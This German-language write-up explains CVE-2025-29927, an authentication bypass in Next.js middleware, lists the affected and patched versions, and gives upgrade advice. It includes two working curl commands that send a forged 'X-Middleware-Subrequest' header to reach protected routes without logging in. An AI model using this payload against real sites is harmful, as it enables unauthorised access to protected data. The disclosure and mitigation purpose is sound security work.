
Proof-of-concept-Exploit für CVE-2025-29927, der die Authentifizierungsumgehung in Next.js-Middleware über den x-middleware-subrequest-Header demonstriert, mit betroffenen Versionen und Schadensbegrenzungsanleitung.
Stell dir einen Türsteher vor dem Club vor, aber wenn du ihm sagst „Ich bin schon drin“, lässt er dich ohne Kontrolle passieren. Genau das ist CVE-2025-29927.
Middleware in Next.js wird vor der Verarbeitung einer Anfrage ausgeführt, was sie zum idealen Ort für die Authentifizierungsverwaltung macht. Next.js verwendet einen internen x-middleware-subrequest-Header, um rekursive Anfragen zu verhindern und Endlosschleifen zu vermeiden. Diese Schwachstelle zeigt, dass es möglich ist, die Middleware-Ausführung vollständig zu umgehen oder zu überspringen – einschließlich kritischer Sicherheitsprüfungen wie der Authentifizierung, bevor eine geschützte Route erreicht wird.
| Branch | Behoben in |
|---|---|
| 15.x | < 15.2.3 |
| 14.x | < 14.2.25 |
| 13.x | < 13.5.9 |
Tausende oder Millionen von Anwendungen laufen auf nicht gepatchten Next.js-Versionen. Wenn nicht entschärft, ermöglicht diese Schwachstelle jedem unauthentifizierten Zugriff auf geschützte Routen – ohne erforderliche Anmeldedaten.
curl -H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware" \
http://localhost:3000/private-area
Die Antwort gibt die geschützte Seite ohne jegliche Authentifizierung zurück.
curl -s "http://<target>/<private-area>" \
-H "X-Middleware-Subrequest: middleware:middleware:middleware:middleware:middleware"
Aktualisiere Next.js auf eine gepatchte Version:
15.x → 15.2.3 oder höher14.x → 14.2.25 oder höher13.x → 13.5.9 oder höher